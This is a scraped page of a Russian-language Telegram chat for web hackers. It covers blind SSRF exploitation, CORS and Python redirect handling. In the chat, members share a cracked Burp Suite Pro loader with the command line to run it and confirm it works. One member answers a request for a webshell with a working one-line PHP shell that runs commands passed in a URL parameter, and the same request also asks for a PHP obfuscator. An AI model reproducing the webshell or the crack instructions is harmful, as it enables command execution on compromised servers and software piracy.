В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

996 membersпожаловаться на группу
2020 May 09

H

HaCk3D in WebPwnChat
I S
allow_redirects=False
+
источник
17:49пожаловаться#1

P

Pulsar in WebPwnChat
всё разобрался. спасибо
источник
17:51пожаловаться#2

P

Pulsar in WebPwnChat
а , response.headers['Location'] еще покажет куда редиректнуло
источник
17:51пожаловаться#3

D

DiMaX in WebPwnChat
Что можно сделать через blind ssrf кроме shellshock?
источник
23:04пожаловаться#4

A

Artem in WebPwnChat
Pulsar
а , response.headers['Location'] еще покажет куда редиректнуло
если тебе нужна вся цепочка, то там есть .history или типа того (ищи в доках).
источник
23:07пожаловаться#5

A

Artem in WebPwnChat
покажет коды и все url
источник
23:07пожаловаться#6

F

Friend in WebPwnChat
DiMaX
Что можно сделать через blind ssrf кроме shellshock?
https://habr.com/ru/post/485888/
Хабр
Подделка серверных запросов, эксплуатация Blind SSRF
Есть такая штука, называется SSRF. Про нее написано немало, но все же, я расскажу тебе вкратце. Допустим, ты заходишь на сайт, заполняешь профиль и доходишь до...
источник
23:09пожаловаться#7
2020 May 10

MW

Mino Wesa in WebPwnChat
Стоит X-Content-Type-Options: nosniff, возвращает application/json, возможно ли каким-либо образом вытащить данные с другого сайта? Пробывал в <script src..>, безуспешно.
источник
00:47пожаловаться#8

I

Ivan in WebPwnChat
если бы каждый app/json можно было бы вытащить через <script src> , мир бы пребывал в огне
источник
00:56пожаловаться#9

I

Ivan in WebPwnChat
тебе только некорректно настроенный корс помог бы
источник
00:56пожаловаться#10

F

Friend in WebPwnChat
Есть нормальный кряк последнего бёрпа ?
источник
01:17пожаловаться#11

А

Алексей in WebPwnChat
Friend
Есть нормальный кряк последнего бёрпа ?
Surferxyz
источник
01:29пожаловаться#12

᠌᠌Sh1Yo in WebPwnChat
BurpSuiteLoader.jar
(166.85 Кб)
"C:\Program Files\Java\jdk-13.0.2\bin\java.exe" -noverify -javaagent:BurpSuiteLoader.jar -jar burpsuite_pro_v2020.4.jar
источник
08:27пожаловаться#13

᠌᠌Sh1Yo in WebPwnChat
burpsuite_pro_v2020.4.jar
(338.05 Мб)
источник
08:27пожаловаться#14

᠌᠌Sh1Yo in WebPwnChat
Только хз работает или нет, не пробовал
источник
08:28пожаловаться#15

BF

Billy Fox in WebPwnChat
᠌᠌Sh1Yo
Только хз работает или нет, не пробовал
Работает :З
источник
10:22пожаловаться#16

I0

Iframe 0x01 in WebPwnChat
Работает, только лучше запускать бурп этим лоадером, а активировать старым.

Потом сделать батник который будет в один клик все это запускать)
источник
10:22пожаловаться#17

l

lazest in WebPwnChat
Ребят, кто какой webshell по советует?
b364k не работает, invoke(как-то) пашет
источник
20:14пожаловаться#18

l

lazest in WebPwnChat
И на подобии обусификатора (надеюсь правильно написал) php fopa у кого есть? Раньше был сайт, сейчас домен продаётся
источник
20:16пожаловаться#19

AS

Andrew Sparks in WebPwnChat
lazest
Ребят, кто какой webshell по советует?
b364k не работает, invoke(как-то) пашет
<?=system($_GET['c']); ?>
источник
20:16пожаловаться#20